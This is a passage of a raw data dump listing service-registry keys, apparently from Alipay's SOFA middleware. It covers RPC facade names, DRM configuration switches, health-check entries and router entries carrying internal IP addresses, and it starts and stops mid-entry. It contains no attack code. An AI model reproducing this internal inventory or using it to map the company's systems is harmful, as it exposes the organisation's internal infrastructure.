DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tallycore.common.service.facade.TallyMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sdabombardier.common.service.facade.product.IotArrangementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.dingqi.drm.DqProductControlDrmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:cxbizruntime@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finauth.common.service.facade.express.service.WealthExpressInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.mosng.endpoint.inner.TripleService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTransferOutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.settle.SettleRateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.TeamEffectivenessFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantBizContentDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.eventbus.api.FullPathQueryToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:app-jsonp-custom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.posprod.PosProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.117.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.finfocore.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcube.common.service.facade.page.ClientSwitchIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.slipProOffType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revtrans.common.service.facade.api.RevtransService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.processor.LdcProcessor:1.0:singleIncreaseOrderProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.quotation.drm.QuotationConfigDRMResource.fundNetValueCacheSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.GFCenterSubAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.template.api.TemplateParameterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.uic.common.service.membership.biz.MembershipActivityBizWriteService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:links@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appxprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.emergency.InsGreyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.feeclcn.common.service.facade.FeeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.business.BusinessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.ObjectEventHandleService:1.0:objectEventHandleService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.core.service.scene.ApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.kmi.KmiServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.DiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.api.CloseInvokeService:1.0:finsign_ext_account@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.agreement.api.AgreementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.glBasicInfoSysTryCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.api.comment.CommentFacadeNew:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imemberprod.service.facade.api.DataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.arrangement.ArrangementPageQueryFacade:1.0:mainSite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.api.ApiresBundleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.userHelpLevelHigh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","seachportal@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insiop.common.service.facade.usergroup.InsIopUserGroupEnlargePlanMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardSysParamsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.rule.InefficiencyRuleDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1120_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linke.aci.LoadAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_CIF#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.facade.service.ActionPropDataSourceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbdinningcenter.common.service.facade.cook.KbCookFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.dt.FinscenePipeOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AppointmentLmyhRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.spi.EquityConsultCallbackFacade:1.0:ofpgrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.permission.PermissionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.148.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.bizcenter.common.service.facade.api.BizDestinationInquiryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.flab.facade.api.evidence.ObtainEvidenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.instalment.facade.api.merchant.PlatformPidQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tbx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecDistrictQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:mrchportalweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ropcn.common.ability.RopDataSourceFacade:1.0:miniProgramDeveloperInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.etetestcore.etetestcoreDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.mng.recover.InfluxReceiptRecoverService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.AutoBuyBackMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AlarmRecordSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.withdraw.WithdrawQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:bkinstassetassign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@kbcateringprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fincommontaskhub.service.facade.service.spi.SliceQueryService:1.0:sccounter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopOrderRefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmng.common.service.facade.api.cscheck.RiskmngCsCheckTaskOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewNodeMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpdcenter.facade.api.FpcSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_FINSERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.admin.MiniAppSyncOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.IndexSignalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.214#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.shadowSmartFoEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ifundprod.common.service.facade.api.ProductConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileaix.core.service.training.TrainingHelpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.cfpcenter.common.service.facade.api.CfpVoucherManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.control.api.BookLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.integration.bizfund.BizfundInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.QueryWithdrawService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:imgs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.risk.api.RiskIssueManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.odps.OdpsMngQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentfactory.common.service.facade.appx.ServiceRecQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkmagicprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.FalconArRedCZoneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdCardMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:recadmin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.assettool.spi.AssetToolCreditService:1.0:ivouchercore-credit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databizcore.common.service.facade.crowd.CrowdQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsEmployeeLeadsAuthorityCommandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.quotationcore.common.service.facade.api.quotation.FqpQcQuotationDataQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.globalprod.common.service.facade.imerchant.IMerchantConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.service.repayoldloan.PcreditRepayOldLoanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessPolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSceneAuthorizationServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.SummaryConfRefreshParamsDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.activity.facade.signup.SignUpServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.ZhuGeDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinschedulerQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.AccountReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.core.LmbFeeNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.recruit.query.RecruitApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.adc.wsexec.facade.WsExecSqlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecsign.common.service.facade.sign.DataPrepareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.integration.kmi.KmiServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.124.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.158.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findataprod.api.FinSuperviseQualityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.aciamcore.common.service.facade.identity.UserServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ufe.engine.facade.runtime.UfeFeatureCalService:1.0:FlowCustoms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardsales.common.service.facade.PcardInvCategoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvServerQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.saction.AuthSactionFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grmcore.common.service.facade.api.GrmPowerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_POLICYBENCH#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.biz.activity.service.UrlCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:wealthyebtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iintegration.common.service.facade.api.MerchantIntegrationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.OperationRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.biz.shared.benefit.AutoBenefitManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPJobService:1.0:process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pointmng_budgetAlert_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.EdeductOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acrescore.facade.LevelCostFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:testApp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.agdscsalipay.common.service.facade.selleradmit.SellerAdmitRealTimeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.consume.query.AutoServiceConsumeQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.TaskRecordManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.common.management.McommentCommonManagementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finriskmngcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.withholdConsultSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.158.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findatacanal.common.service.manage.gildata.StibShareIpoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opsct.common.service.facade.api.DecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.tool.TemplateSyncFacade:1.0:SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.charge.BillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PAYCORERECEIPT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniprod.common.service.facade.member.api.MemberTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.PortalCreativeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.IdServiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.GuardianTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundprod.biz.asset.service.AssetIsolationAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_PROCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finvirtualta.core.service.fund.repository.FundRuleDetailRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_MCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.alphasec.service.facade.AlphaSecEventMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.mif.common.service.facade.industry.MccIndustryPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.customscenter.common.service.facade.declare.api.DeclareRecoveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:customscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:antfeatureflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.127.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.252.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acdoccore.common.service.facade.comment.CommentManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpwm.facade.sceneinvest.starwish.api.StarWishRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.api.FluxTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.ProductUpgradeConfigMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agds.cdecision.label.facade.CustomerLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_MPA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.recmixer.common.service.facade.CategoryCandidateService:1.0:ofpgrowth_homepage@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.user.service.InvestorCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.common.manage.facade.api.solution.XcodeProcessorListQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.sales.OrderLinkNotifyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetProjectSaleInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_2600_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:ternbaseinternet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoevent.common.service.facade.MsgProdConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igadaptor.common.service.facade.AdaptorApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promodmp.service.facade.tag.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.trans.api.SingleTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.alipayForceCreateVoucherTemplate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rmsdeploy.common.service.facade.OSSFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.platform.service.facade.api.PlanUrgeApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.ConfigInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.SkillGroupMonitorService:1.0.0:clive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdServiceRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-priceAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdProspectManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FundRedeemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServicePerformanceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.shared.message.MessageConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finbatch.finbatchObDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-S_findefencecore_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.antfinancial.antchain.cloud.endpoint.facade.ContractDataModelFacade: